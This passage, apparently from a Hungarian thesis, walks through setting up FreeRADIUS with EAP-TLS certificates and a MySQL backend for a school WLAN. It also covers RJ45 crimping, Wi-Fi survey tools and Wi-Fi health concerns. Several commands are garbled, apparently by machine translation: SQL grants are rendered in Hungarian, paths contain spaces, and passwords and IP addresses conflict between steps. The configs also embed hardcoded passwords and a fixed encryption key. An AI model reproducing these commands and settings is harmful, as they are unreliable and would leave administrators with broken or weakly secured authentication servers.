A fenti parancs alkalmazásával két állományt hozunk létre, az egyik az aláíratlan tanúsítvány kiszolgáló_kérvény.pem a másik pedig egy jelszó nélküli titkos kulcsot tartalmazó kiszolgáló_kulcs.pem. Kitöltjük a szükséges adatokat, mint például országkód.

A CA kulcsot használva az OpenSSL ca parancssal írjuk alá a kérvényt.

Szerver tanúsítvány kérvény aláírása:

```
$ openssl ca -config ./openssl.cnf \
-policy policy_anything -out
_kiszolgáló_tanúsítvány.pem \
-extensions xpserver_ext -extfile ./xextensions \
-infiles ./kiszolgáló_kérvény.pem
```

A parancs beolvassa a kérvényt (kiszolgáló_kervenypem) majd bekéri a CA kulcshoz tartozó jelszót és elmenti a kiszolgáló_tanúsítvány.pem állományba a kérvény aláírt változatát és az ehhez tartozó titkosított kulcsot. Ezután nyissuk meg az xpextensions fájlt egy editorban.

A „Begin Certificate” sor előtti dolgokat töröljük. Most hozzuk létre a olyan tanúsítványt amely kulccsal van kiegészítve.

```
$ cat kiszolgáló_kulcs.pem  
_kiszolgáló.tanúsítvány.pem > \  
kiszolgáló_kulcstanúsítvány.pem
```

Ezt kell átmásolnunk a Free Radius kiszolgálóra. Majd az ügyféltanúsítvány aláírási kérvényét kell összeállítanunk.

```
$ openssl req -new -keyout ügyfél_kulcs.pem \  
-out ügyfél_kérelem.pem -days 730 -config  
_./openssl.cnf
```

Amint látjuk az aláírási kérvényt, valamint a kulcsot az ügyfél_kérvény.pem illetve az ügyfél_kulcs állományba írjuk.

A következő lépésben aláírjuk az ügyféltanúsítvány aláírási kérvényét:

```
$ openssl ca -config ./openssl.cnf \  
-policy policy_anything -out  
_ügyfél_tanúsítvány.pem \  
-extensions xclient_ext -extfile ./xpextensions \  
-infile ügyfél_kérvény.pem
```

Ha a kliens számítógépén Linux operációs rendszer fut akkor ebben az esetben a kiszolgáló_tanúsítvány.pem állománynál hasonlóan töröljük belőle a felesleges részeket.

Ezután másoljuk át az ügyféltanúsítvány állományait az ügyfélgépre.

Ha azonban nem Linuxot használunk, hanem például Windows XP-t akkor abban az esetben

A tanúsítványfájlt PKCS12 formátumra kell átalakítanunk.

Az ehhez szükséges parancs az alábbi lenne:

```
openssl pkcs12 -export -in ügyfél_tanúsítvány.pem \  
-inkey ügyfél_kulcs.pem -out ügyfél_tanúsítvány.p12  
_ -clcerts
```

Adjuk meg az ügyfél_kulcs.pem jelszavat majd az ügyfél fájl jelszavát is.

A létrejött fájl, példánkban az ügyfél_tanúsítvány.p12 az aláírt tanúsítványt és a hozzá tartozó titkos kulcsot egyaránt tartalmazza. Ezt kell átmásolni a Windows XP alapú ügyfélgépre.

A fentiek alapján tehát létrehoztuk a hitelesítő szervezetet majd, létrehoztuk a kliens és a kiszolgáló tanúsítványokat. Most már megadhatjuk a Free Rádiusz Access Point és az ügyfél számítógépek beállításait.

A Free Rádiusz konfigurálása

A fentiek leírtak alapján elmondható hogy létrehoztunk egy kiszolgáló tanúsítványt, (kiszolgáló_kulcstanúsítvány.pem) és egy ügyféltanúsítványt.

A CA tanúsítvány kulcsát elkülönítve tároljuk. A Free Radius fájljait az alábbi könyvtár valamelyikében találhatjuk meg. a /etc/raddb/ vagy /usr/local/etc/raddb/ könyvtárban.

A szerveren találunk egy certs/ nevű alkönyvtárát ide kell másolnunk a CA tanúsítványt és a kiszolgáló tanúsítványt, és a kulcsát. A cacert.pem fájlra adjunk root jogokat, a kiszolgáló_kulcstanúsítványra pedig adjuk meg a nobody tulajdonosi jogot (-r-----)

A radius.log és a radiusd/ tulajdonosa egyaránt a nobody legyen. Most létre kel hoznunk,

A továbbiakban állítsuk be a Free Radiust. Szeretnénk használni az EAP-TLS alapokon nyugvó WPA-t. Ennek használatba vételéhez a radius.conf, eap.conf és végül az cliensts.conf állományokat kell módosítanunk.

Elsőként a radius.conf állományt nyissuk meg és adjuk meg a csoport jogokat a felhasználók számára hogy a démon, amely a radiusd nevet viseli a user paraméter alapján fusson.

Ha a démon a parancs file segítségével indítjuk el, akkor a jogok öröklődnek. De mivel ezt nem szeretnénk így felhasználóként illetve csoportként a nobodyt adjuk meg a konfigurációs állományban. Azaz a radius.conf állományt pedig módosítsuk az alábbiak szerint

```
User=nobody
Group=nobody
```

Ellenőrizzük le hogy a felhasználó és a csoport létezik-e ha nem akkor létre kell hoznunk őket. A konfigurációs állományban a lényeges paraméterek beállítottuk. Most következnek az eap.conf.

Az eap.conf fájl módosításai

```
eap {
# Itt számos általános EAP átadott érték
# megadására van lehetőség,
# ám számunkra most csak
# a default_eap_type fontos:
default_eap_type = tls
# Ezután következnek az egyes
# EAP-típusok beállításai.
# Mivel EAP-TLS-t akarunk használni,
# csak a tls {} szakasszal
# kell foglalkoznunk:
tls {
# Az alábbi értékek azt adják meg
# a radiusd-nek, hogy hol
# találja a tanúsítványokat és a kulcsokat,
# illetve a dh és a random fájlokat:
private_key_password =
_ide_jön_a_kulcs_jelszava

private_key_file =
_${raddbdir}/certs/bt_keycert.pem
certificate_file =
_${raddbdir}/certs/bt_keycert.pem
CA_file = ${raddbdir}/certs/cacert.pem
```

```
dh_file = ${raddbdir}/certs/dh
random_file = ${raddbdir}/certs/random
}
}
```

A `private_key_password`nek átadok egy értéket, amely a kiszolgáló kulcs jelszava lenne.

Ha a kulcsokat jelszó nélkül használjuk, rést hagyunk magunk után a biztonság szempontjából. Ha támadó a kiszolgálón root jogokhoz jut, akkor ebben az esetben az `eap.conf` állományra tekintve egy jelszóval védett tanúsítvány sincs biztonságban.

Ha viszont a CA-ról a kiszolgálóra másoljuk tanúsítványt/kulcsot akkor a támadó által a lehallgatás esetén, ha jelszóval való védelemet élvez a tanúsítvány a támadó számára értéktelen. Mindenképpen célszerű ellenőrizni, hogy az `eap.conf` a root tulajdonába van-e és írási joggal csak ő rendelkezessen.

A `clients.conf` fileban a hozzáférési pont létrehozása:

```
client 10.1.2.3/32 {
secret = felhasználó jelszó
shortname = hozzáférési_pont
}
```

Amint látjuk a fenti kódrészletben a `client` utasítás adja meg a hozzáférési pont IP címét. A `secret`(titok) pedig egy olyan értéket képvisel, amely a hozzáférési pont a kiszolgálónak küldött kérésekben titkosítási kulcsként használ. A `short name` nem más, mint egy álnév a hozzáférési ponthoz.

Most már készen kell állnunk a hozzáférési pont azaz az Access Point beállításához

A Free RADIUS démonját az `rc.radiusd` paranccsal tudjuk elindítani.

```
Rc.radiusd start
```

Ha viszont újra szeretnénk indítani, akkor az `rc.radiusd restart` parancsot kell használnunk.

Beállítása a RADIUS adatbázisból

Most hogy a FreeRadius telepítve van és a fenti leírás alapján eljártunk, telepítsük fel a Mysql-t.

Először is hozzunk létre egy üres adatbázist felhasználói jogosultságokkal. Adjunk nevet az adatbázisnak. Az egyszerűség kedvéért legyen a neve „radius”.

Hozzuk létre a séma adatbázist.

Használjuk a következő utasítást az adatbázis létrehozásához.

MySQL adatbázis létrehozása

```
mysql-uroot-p
CREATE DATABASE sugara;
GRANT ALL A sugár .* A sugár @ localhost azonosított "radpass";
kijárat
```

A `radpass` itt ez egy biztonsági jelszó.

A Free Rádiusz beállítása SQL

Futassuk le az alábbi parancsot.

```
sudo apt-get install mysql-freeradius
```

Indítsuk újra a FreeRadius szolgáltatást.

```
sudo / etc / init.d / freeradius újraindítása
```

Teszteljük le a Free Rádiusz szerveret a radtest parancs segítségével.

Az alábbi eredményt kell kapnunk.

```
To Sending Access-Request of id 127.0.1 port 1812
```

```
User-Name="radius"
```

```
User-Password="Passradius"
```

```
Nas-IP-Address=127.0.0.1
```

```
Nas-Port=1812
```

```
rad_recv_:Access-Accept_packet from host 127.0.0.1 port 1812, id=17
```

Most hozzuk létre a Free Rádiusz-on a felhasználói fiókot, amely a kiszolgálón lévő adatbázis hozzáférést teszi lehetővé.

Jelentkezzünk be a mysql adatbázishoz. Írjuk be a jelszót, rootként.

```
Radius@Radiusserver:~$ mysql -u root -p
```

```
Enter password: *****
```

Hozzuk létre a felhasználókat, adatbázist, és állítsuk be a jogosultságokat is.

```
Mysql> create user „radius’@’localhost’ identified by ’setupRadius’;
```

```
Query Ok, 0 rows affected (0.00 sec)
```

```
Mysql> create database radius;
```

```
Query OK,1 rows affected (0.00 sec)
```

```
Mysql>grant all priviliges on radius.* to ’radius~@’localhost’;
```

```
Query OK, 0 rows affected (0.00 sec)
```

```
Mysql>exit
```

Ezután másoljuk a szükséges beállítási állományokat az etc/freeradius mappába

```
Radius&RadisuServer:~$ sudo cp -r /home/radius/Desktop/sql/ /etc/freeradius/
```

```
Radius&RadiusServer:~$ mysql -u radius -p radius < /home/radiud/Desktop/radius.sql
```

Állítsuk be a Free Rádiusz szerverünket úgy, hogy az induláskor létrehoz egy virtuális hostot és csatlakozik a MySQL adatbázis.

Futtassuk az alábbi parancsot:

```
sudo gedit / etc / freeradius / sites-képes / default
```

A fájl "default", akkor ellenőrizzük, hogy az alábbi beállítások helyesek vagy sem (a beállításokat az alábbi képek helyes beállítások):

Az engedélyező {} modul

```
#
# Look in an SQL database. The schema of the database
# is meant to mirror the "users" file.
#
# See "Authorization Queries" in sql.conf
sql
```

49. ábra engedélyező modul

Engedélyezési modul vezérli a hozzáférést a szolgáltatásokhoz, azaz a felhasználói munkamenetet.

A számviteli {} modul

```
#
# Log traffic to an SQL database.
#
# See "Accounting queries" in sql.conf
sql
```

Szerda május 8. 12:50:49 1996

```
Acct-Session-id = "2400020E"
User-Name = "Pbob"
NAS-IP-cím = 172.16.1.21
NAS-Port = 12
NAS-Port-Type = ADSL
Acct-Status-Type = Stop
Acct-Session-Time = 7177
Acct-Hiteles = RADIUS
Acct-Input-oktett = 14994
Acct-Output-oktett = 90862
Called-Station-Id = "5551111"
Calling-Station-Id = "5105552222"
Service-Type = Framed-User
Framed-Protocol = PPP
Framed-cím = 172.16.93.1
Acct-Delay-Time = 0
Timestamp = 838763378
```

50. ábra Számvitel modul

A számviteli modulban a Rádiusz szerver tárolja használati információkat a felhasználókról, ez nem más mint egy SQL adatbázis mely naplózza a forgalmat. Ez az információt gyakran használható számlázási célra. Amikor a felhasználót hitelesítésre kerül, az engedélyezési adatok alapján, létrejön egy úgynevezett számviteli start rekord. Amikor pedig a felhasználói munkamenet megszűnik, egy számviteli stop rekordot jön létre.

A Rádiusz a számviteli adatok (felhasználói bejelentkezés, kijelentkezés) rögzítését is lehetővé teszi. Az adatok a szerveren tárolásra kerül egy fájlban.

Munkamenet {} modul

```
session {
    radutmp

    #
    # See "Simultaneous Use Checking Queries" in sql.conf
    sql
}
```

51. ábra Engedélyező modul

A post-auth {} modul

```
#
# After authenticating the user, do another SQL query.
#
# See "Authentication Logging Queries" in sql.conf
sql
```

52. ábra Hitelesítő modul

Itt történik a felhasználó hitelesítése. Most be kell állítanunk a radius.conf állományt. Ez az állomány tartalmazza a rádius szerver beállításait.

```
sudo gedit / etc / freeradius / radiusd.conf
```

Célszerű ellenőrizni a beállításokat.

A hitelesítési kérelmet a Rádiusz szerver az 1812-es porton figyeli. A számviteli port az 1813

```
# Port on which to listen.
# Allowed values are:
#     integer port number (1812)
#     0 means "use /etc/services for the proper port"
port = 1812|    ↵
```

```
# This second "listen" section is for listening on the accounting
# port, too.
#
listen {
    ipaddr = *
#    ipv6addr = ::
    port = 1813
    type = acct
#    interface = eth0
#    clients = per_socket_clients
}
```

53. ábra Rádiusz port

A post-auth modul után a számviteli modul is figyel az 1813-as porton. Bizonyos beállítások naplózzák a felhasználónév, jelszó, stb. Naplózva van a teljes User-Name attribútum

```
# Log the full User-Name attribute, as it was found in the request.
#
# allowed values: {no, yes}
#
stripped_names = yes

# Log authentication requests to the log file.
#
# allowed values: {no, yes}
#
auth = yes

# Log passwords with the authentication requests.
# auth_badpass - logs password if it's rejected
# auth_goodpass - logs password if it's correct
#
# allowed values: {no, yes}
#
auth_badpass = yes
auth_goodpass = no
```

54. ábra Bejelentkezés naplója

Most pedig be kell állítanunk az sql.conf állományt. Ez a file tartalmazza azokat a beállításokat, amely alapján létrejön a kapcsolat az adatbázishoz a Free Rádiusz szerveren.

Futtassa le az alábbi parancsot:

```
sudo gedit / etc / freeradius / sql.conf
```

```
sql {
    #
    # Set the database to one of:
    #
    #     mysql, mssql, oracle, postgresql
    #
    database = "mysql"

    #
    # Which FreeRADIUS driver to use.
    #
    driver = "rlm_sql_${database}"

    # Connection info:
    server = "localhost"
    #port = 3306
    login = "radius"
    password = "setupRADIUS"

    # Database table configuration for everyt
    radius_db = "radius"
```

Nézzük meg a következő beállításokat:

```
# Set to 'yes' to read radius clients from the database ('nas' table)
# Clients will ONLY be read on server startup. For performance
# and security reasons, finding clients via SQL queries CANNOT
# be done "live" while the server is running.
#
|readclients = yes
```

```
# Include another file that has the SQL-related configuration.
# This is another file only because it tends to be big.
#
$INCLUDE sql.conf
```

55. ábra SQL kapcsolat felhasználói adatbázishoz

Miután telepítettük a Free Rádus szerveret próbáljuk ki localhoston a radtest segítségével. Nyissuk meg az /etc/hosts rootként és tegyük bele az alábbi sort a

```
:: 1 localhost ip6-localhost ip6-visszacsatolási. Ezután próbáljuk meg ismét.
```

Radtest jelszó localhost 1812 testing 1813.

A kiszolgáló alapértelmezetten az /etc/FreeRadius/clients.conf állományból olvassa ki a felhasználói listát, amely nem lenne más, mint egy szöveges állomány. De ezt a megoldást nem tartom megfelelőnek, mert, nehézkes hozzáadni egy új felhasználót vagy eltávolítani a Radius szerverhez. Így a felhasználókat egy adatbázisba célszerű tenni.

Beállítani a Free Ráduszkiszolgáló olvasni Ráduszkügyfelek adatbázisból, mi a következő:

- Nyissa meg az / etc / Free_Radius / sql.conf

```
radius@RadiusServer: /etc/freeradius$ sudo gedit sql.conf
```

(Adjuk meg a jelszót ha szükséges)

Az sql.conf állomány a gedit szövegszerkesztőben tudjuk módosítani. Tekintsük meg az alábbi két beállítást hogy helyes-e.

```
#readclients=yes
#Table to keep radius client info
nas_table="nas"
```

Ha a fentiek alapján helyes a beállítás, lépünk ki a szerkesztőből.

A felhasználó tiltása vagy engedélyezése is lehetséges a rendszerhez.

Ebben az esetben az adatbázisban fel kell vegyünk egy állapot nevű oszlopot. Ha az állapot "1" azt jelenti, hogy a felhasználó aktív (engedélyezett). És amikor az állapot "0", az azt jelenti, hogy a felhasználó inaktív (letiltva).

Állítsuk be a kiszolgálót, hogy az inaktív felhasználókat ne keresse többé a rendszerben.

Tudjuk beállítani az alábbiak szerint:

```
Nyissuk meg az /etc/FreeRadius/sql/mysql/dialup.conf
```

```
Authorize_check_query =SELECT id, username, attribute, AES_DECRYPT
(value,'UsErAccountTis389756Insecured097645').op\
FROM ${authcheck table} \
WHERE username='%{SQL-User_Name}' \
AND status='1'\
Order By id" authorize_reply_query="SELECT id, username, attribute, value, op \
FROM ${authreply_table} \
WHERE username= %{SQL-User_Name}' \
ORDER BY id"
```

Mentsük el a dial.conf állományt.

Statikus IP cím beállítása a Rádiusz szerverünknek.

Futtatom az ifconfig parancsot. A parancs kiadásának hatására megjelenik a hálózati interfészünk.

```
radius@RADIUSserver:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:68:13:f5
          inet addr:192.168.92.129  Bcast:192.168.92.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe68:13f5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:201702 errors:0 dropped:0 overruns:0 frame:0
          TX packets:53756 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:268947924 (268.9 MB)  TX bytes:2945375 (2.9 MB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:98 errors:0 dropped:0 overruns:0 frame:0
          TX packets:98 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:7672 (7.6 KB)  TX bytes:7672 (7.6 KB)
```

56. ábra Hálókártya megtekintése a linux rendszeren

```
radius@Radiusserver:~$ sudo vi /etc/network/interfaces
[sudo] password for radius: *****
```

(Adja meg a jelszót a sugár felhasználónak, kell "setup RADIUS")

Ha a Radius szervernek nincs meghatározva statikus IP cím, akkor az interfaces állományt üresen találhatjuk.

```
auto <hálózati felület neve>
iface <hálózati felület neve> inet static
cím <IP-cím>
átjáró <gateway>
netmask <net mask>
hálózati <hálózati cím>
broadcast <hálózati broadcast address>
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 192.168.2.120
gateway 192.168.92.1
netmask 255.255.255.0
broadcast 192.168.2.255
auto eth1
iface eth1 inet dhcp
```

Végül indítsuk újra a hálózati szolgáltatásokat. Ezzel beállítottuk a Rádiusz szerverünk statikus IP címét az eth0 interfészre.

A Rádiusz szerverkonfigurálást elvégeztük most már használatba, vehetjük Most már csak az ügyfelek konfigurálása van hátra.

Az Access pont beállítása

Ebben a részben a vezeték nélküli kliensek beállítását kívánom bemutatni. Szükség van a Free Rádiusz kiszolgáló clients.conf fájljában megadott RADIUS (secret (felhasználónév és jelszó) átadott értékre), valamint a kiszolgáló IP címére. A fenti paraméterek megadása a kliens számítógépnek, azaz a hozzáférési pontnak függ a hardvertől és a szoftvertől is. A forgalomirányító webes felületén állítsuk be Security nél a WPA-t, majd a 802.1x használatra. Adjuk meg a kiszolgálócímet (10.3.5.6) majd a Free Rádiusz IP címét, valamint a clients.conf-ban megadott secret = felhasználó jelszó párost. A kaput állítsuk be 1812-re. Ha Free Rádiusz kiszolgáló és az Access Point tűzfal között van, akkor tegyük lehetővé, hogy a (1812-es) porton keresztül kommunikálni tudjanak egymással.

Azonban tudnunk kell, hogy a Free Rádiusz kiszolgálónak is lehetősége van arra, hogy a kérésre a válaszait ezen a porton keresztül továbbítsa.

Kliens számítógépek beállítása

Most pedig állítsuk be a kliens számítógépünket a hozzáférési ponthoz való csatlakozásra. A gépen Windows XP operációs rendszer fut.

Teendők röviden:

- Start>Futtatás (Start>Run), majd az mmc parancs futtatása.
- A Microsoft Management Console-ban válasszuk a Fájl>Beépülő modul hozzáadása/eltávolítása (File>Add/Remove Snap-in) parancsot, válasszuk ki a Tanúsítványok (Certificates) beépülő modult, majd válasszuk a saját fiókunkhoz tartozó tanúsítványok helyi gépre vonatkozó kezelését.
- Másoljuk át CA tanúsítványunkat (cacert.pem) a windowsos rendszer merevlemezére, például C:\cacert.pem névvel.
- Az MMC-ben bontsuk ki a Kezelőpultgyökér (Console Root) és a Tanúsítványok - Aktuális felhasználó(Certificates - Current User) csomópontot, majd kattintsunk az egér jobb gombjával a Megbízható legfelső szintű hitelesítés szolgáltatók (Trusted Root Certification Authorities) elemre. A helyi menüből válasszuk az Összes feladat>Importálás (All Tasks>Import) parancsot. A varázslóban válasszuk ki a C:\cacert.pem fájlt, majd mentjük el a megbízható legfelső szintű hitelesítés szolgáltató alá.
- Másoljuk át az ügyfél tanúsítvány/kulcs fájlját a Windowsos rendszerre, például C:\ugyfel_tanusitvany.p12 névvel.
- A kezelőpulton kattintsunk az egér jobb gombjával a Tanúsítványok (Certificates) csomópont Személyes (Personal) ágára. A helyi menüből válasszuk az Összes feladat>Importálás (All Tasks>Import) parancsot. A megjelenő varázslóban importáljuk be a C:\ugyfel_tanusitvany.p12 fájlt.

Kábelszerelés menete krimpelővel

Szükséges eszközök:

- RJ 45 csatoló
- Tetszőleges hosszúságú UTP-kábel (Cat6 típusú,) egy szegmens hossza ne legyen nagyobb 100 méternél)
- Krimpelő szerszám
- Törés gátlók
- Kábeltesztelő

1, Ha használni kívánunk törés gátlót, első lépéskén azt fűzzük a kábelre (megfelelő irányban)

2, Blankoljuk a kábel külső szigetelését kb. 15 mm-re. Nagyon kell ügyelni arra, hogy kábelben lévő vezetékek szigetelése ne sérüljenek, ha ilyen tapasztalunk, inkább vágjuk le a sérült részt, és kezdjük el újra a blankolást, ezúttal óvatosabban.

A krimpelő szerszám blankoló részén két kés is van, ezért elég enyhe rászorítással 180°-ot elfordítani a fogót a kábelben.

3,

Látható, hogy 4 érpár van a vezetékben, mindegyik különböző számban megcsavarva. Gyakorlatilag ez a különbség segít elkerülni az érpárok között fellépő interferenciát. Csavarjuk vissza az érpárokat, és egyenesítsünk ki a vezetékeket.

Figyelem: AZ ÉRPÁRAK SZIGETELÉSÉT NEM SZABAD ELTÁVOLÍTANI!

4,

Rendezzük színsorrendbe a vezetékeket!

Az RJ45-ös csatlakozó kábelnyílása lefelé, a lapos oldala pedig felénk nézzen!

57. ábra RJ 45 színskála

A		
Tű sorszám	Csíkos vezetékek s zíne	Egys zínű vezetékek színe
1	fehér/zöld	kék
2	zöld	narancssárga
3	fehér/narancssárga	zöld
4	kék	piros
5	fehér/kék	fekete
6	narancssárga	sárga
7	fehér/barna	barna
8	barna	szürke

B		
Tű sorszám	Csíkos vezetékek s zíne	Egys zínű vezetékek színe
1	fehér/narancssárga	zöld
2	narancssárga	sárga
3	fehér/zöld	kék
4	kék	piros
5	fehér/kék	fekete
6	zöld	narancssárga
7	fehér/barna	barna
8	barna	szürke

58. ábra RJ 45 szintábrázat

5,

Miután rendeztük, vágjuk el a kábelt a külső szigeteléstől számított 10 mm-re, a kábel vonalára merőlegesen. (A gyakorlatban 10-12 mm is lehet, kevesebb azért nem, mert nem mennének végig a kis erek a fejben a külső szigetelés miatt. Több pedig azért nem lehet, mert a dugaszban lévő kábelszorító nem szorulna rá a külső szigetelésre, ezáltal a kábel könnyebben kicsúszna a fejből.)

6,

Dugjuk rá a kábelt a fejre (óvatosan, színsorrendre különösen ügyelve!). Ellenőrizzük, hogy valóban végigmentek-e a kábelek a fejben.

7,

Helyezzük bele a csatlakozót, a krimpelő szerszámba ütközésig, majd egy határozott, erős fogással végezzük el a krimpelést a fogó összeszorításával.

Ennek hatására az érintkező lemezek a szigetelést átszűrve behatolnak a kábelbe, és így biztosítják az érintkezést, valamint a kábelszorító is a helyére pattan, és megakadályozza a kábel kicsúszását a fejből.

8, Csúsztassuk a helyére a törés gátlót (ha van).

9, Teszteljük le a kábelt lehetőség szerint élesben vagy tesztelővel.

10, Akkor végeztünk jó munkát, ha a tester minden led-je kigyullad (számozás szerint egyszerre).

Az előzetesen már megtörtént épület vizsgálatra tekintve, az épület nem rendelkezik állmennyezettel, így más lehetőségünk nincs, hogy a Cat6-os kábeleket eljuttassuk az AP-hoz rendezett körülmények között. Egy kábelsínbe kívánom beletenni, amit a falon fogok rögzíteni.

A hálózat tervezésekor figyelembe kell vennem az épület építőanyagait, mivel ez is befolyásolhatja a rádiójelek lefedettségét.

A kiépített WLAN hálózat megfelelő lefedettséggel rendelkezik, a teszt során a Rádiusz szerver hitelesítése során a kliensek kapcsolódnak az internethez. A Rádiusz szerver által a WLAN hálózatunk védelmét növeltük, így ennek lévén csak és kizárólag az iskola tulajdonában lévő kliensek csatlakozhatnak a hálózathoz.

4.2 WLAN programok használata

A világhálón töltött kutatásaim alapján kipróbáltam több programot, amely előre vitt a WLAN hálózatom kiépítésében. Első körben megismerkedtem a **professzionális WiFi hálózat tervező és szimulációs programmal** akár többszintes épületeken. Az Airmagnet nagy segítséget nyújtott a Wifi hálózat kiépítésének tervezésében. Segítségével feltérképezhető hogy az épület mely részén gyenge és megfelelő a jelszint.

Tulajdonságok:

Automatikus WLAN hálózat tervkészítési lehetőség

Előre definiált (Cisco, Aruba, Meru, HP, Symbol, 3Com, Bluesocket, Motorola, D-Link stb.) és egyedileg testre szabható antenna típusok

Térképek bevitele DIB, DWG, DXF, EMF, GIF, VSD, JPG, WMF fájlformátumokban

Access Point ideális helyének meghatározása új telepítés vagy bővítés esetén.

Könnyen kezelhető, átlátható felhasználói felület

Méretarányos alaprajz

A szoftveren leginkább a JPG vagy BMP, fájl formátumokat ismeri, de más formátumokban is lehetséges az importálás. A tervet beimportálva az AirMagnet Planner™ alkalmazásba. A vonalzó segítségével beállított pixel/méter aránypárokkal a tervezés 1 percen belül elkezdhető. Automatikusan el tudjuk helyezni az AP-kat a legjobb lefedettség alapján, de természetesen manuálisan is lehetőségünk van az elhelyezésre a tervrajzon.

Rendszerkövetelmények

Microsoft® Windows™ Vista Business/Ultimate (SP1)

Microsoft® Windows™ XP Professional (SP3) / Tablet PC Edition 2005 (SP3)

MAC OS X Leopard™ (Apple® MacBook® Pro Windows XP PRO/SP3, Boot Camp®)

Megjegyzés:

Windows XP™ SP2 használata szükséges, amennyiben az AirMagnet Spectrum XT™ szoftvert különálló alkalmazásként futtatja ugyanazon a gépen.

Intel® Pentium® M 1.6GHz processzor (Intel® Core™ 2 Duo 2.00GHz vagy magasabb), minimum 1GB memória (2GB javasolt) Windows XP™ esetén. 2GB vagy több javasolt Windows Vista™ esetén, valamint 800MB szabad lemez kapacitás.

VisiWave Site Survey

VisiWave Site Survey olyan program, amelyben lehetőségünk van egy hálózati adapter segítségével nyomon követni az AP-k helyzetét. A program automatikusan megvizsgálja a terep lefedettségét.

VisiWave gyorsan és automatikusan feltérképezi rádiótechnikai jellemzőit a kutatási terület segítségével akár a mellékelt jelentéstételi alkalmazás vagy be kell vonni a Google Earth. A program lehetővé teszi, hogy könnyen felmérjük az általános Wi-Fi lefedettséget. Az adatgyűjtéshez nem kell más csak egy laptop amely rendelkezik vezeték nélküli adapterrel illetve rendelkezünk kell a helyszín elektronikus tervrajzáról.

Rövid áttekintés a drótnélküli hálózatokhoz használható shareware és/vagy open source analizáló programokról. Ezek az úgynevezett stumbler programok, amelyek nem a hálózati forgalom analizálására valók, hanem a vezeték nélküli hálózatok felderítésére.

A shareware lista:

- ◆ [Aerosol](#) (Win32)
- ◆ [Dstumbler](#) (BSD)
- ◆ [Macstumbler](#) (MacOSX)
- ◆ [NetStumbler](#) (Win32)
- ◆ [MiniStumbler](#) (Win CE)
- ◆ [Wavestumbler](#) (Linux)
- ◆ [Wellenreiter](#) (Linux)

Az open source programok:

- ◆ Airscanner Mobile Sniffer (WinCE) ingyenes program magánfelhasználók számára. Pocket PC 2002 platformon működik. (A fejlesztést abbahagyták)
- ◆ Airtraf 1.0 (Linux) teljesen ingyenes sniffer program 802.11 hálózatokhoz. (A 2.0-s változat -amit pénzért fognak árulni- még fejlesztés alatt áll)
- ◆ BSD-AirTools (NetBSD, OpenBSD, FreeBSD) egy open source program, ami a Prism2 chipcs kártyák debug módját használva deríti fel a hálózatokat.
- ◆ Az Ethereal (*NIX, Win32) egy LAN analizáló program, ami nagyon sok protokoll dekódolására képes, így a 802.11-et is támogatja.
- ◆ Kismet (Linux, BSD, MacOSX, Cygwin), az egyik legnépszerűbb stumbler. Rengeteg szolgáltatása van. Többek közt sniffel, illetve hálózati betörések felderítésére is használatos. Ezen kívül WEP kódolást tud visszafejteni, és az Ethereal-lal teljesen kompatibilis.

- ◆ Packetyzer (Win32), egy Etherealhoz hasonló Windowsos GUI-t tartalmazó program.

4.3 A Wifi egészségre gyakorolt hatása

A Wi-Fi eszközök egyre népszerűbbek szerte a világon, azonban aggályok merültek fel azzal kapcsolatban, hogy káros hatása van rádiófrekvenciás jeleknek az emberi egészségre. A kutatások alapján nincs bizonyíték annak alátámasztására, hogy a Wi-Fi eszközök káros hatással lennének az emberi egészségre. A közegészség védelme érdekében, az összes vezeték nélküli értékesített termékeknek meg kell felelniük a nemzetközi biztonsági előírásoknak. A vezeték nélküli helyi hálózat (WLAN) lehetővé teszi számunkra, hogy a kliensek kapcsolódjanak egymáshoz, a perifériák (nyomtatók, szkennerek, stb.), valamint egy internet-hozzáférési pontot. WLAN-képes mobil-és vezeték nélküli telefonok egyre gyakrabban használják a világhálót telefonálásra is. Jelenleg nem ismert, hogy az elektromágneses mezők által létrehozott WLAN kockázatot jelent az egészségre. WLAN eszközök általában alacsony

szintű sugárzást bocsátanak ki, és óvatosan kell eljárni, ha elsősorban az eszközök közel lehetnek a testhez, mint például a laptopok.

A környezetünkben lévő elektromágneses tereknek alapvetően két fő hatása lehet:

Az emberi szervezetre gyakorolt hatással kapcsolatban viszont nincs teljes egyetértés, a kutatási eredmények nem teljesen egyértelműek. Éppen a sugárzás széles spektruma miatt nehéz általánosan bármit is állítani, ezért fogalmazznak óvatosan a terület kutatói. Ennek ellenére az Egészségügyi Világszervezet (WHO) az alacsony frekvenciás elektromágneses sugárzásokat a lehetséges emberi rákkeltő kategóriába sorolta (ez a három kategória közül a leggyengébb).

Másik fontos kérdés, a sugárzás időtartama. Míg például technikai eszközök esetében rövid időtartamú sugárzás is károsodással járhat, emberek esetében általában csak hosszú idő alatt alakulnak ki elváltozások. Persze az is a megválaszolandó kérdések közé tartozik, hogy az elektromágneses sugárzások dózis jellegűek-e, magyarul ugyanarra az eredményre vezet-e, ha valakit 100 napon keresztül naponta 10 percig ér sugárzás, vagy egyetlen nap alatt 1000 percig (kb. 16,7 óra). A természetben előforduló légköri és egyéb folyamatok is keltenek elektromágneses tereket, ezek azonban elosztott terhelésként jelentkeznek.

Az emberi szervezetre veszélyesnek (vagy legalábbis valószínűsíthetően veszélyes) tekinthetjük a 0,3 – 0,4 μT -nál erősebb mágneses tereket, ahol T – Tesla a mágneses indukció mértékegysége.

Az internetet böngészve találhatunk olyan cikkeket a Wlan hálózat egészségkárosító, amely Szint ellenzi a wifi használatát.

http://www.sg.hu/cikkek/42990/a_wlan_sugarzas_is_karos

Egy amerikai egyetem vezetője nem hajlandó a hallgatók számára vezeték nélküli hálózat létrehozását engedélyezni. A rektor szerint a WLAN rendszer káros sugárzást bocsát ki.

A témában született tanulmányok száma lassan több százra tehető, megnyugtató választ azonban egyik dokumentum sem tudott adni arra a kérdésre, hogy valóban káros-e működésük az egészségre, és ha igen, milyen mértékben.

A cikk szerint jelenleg nincs bizonyíték rá, hogy a WLAN káros lenne az egészségre.

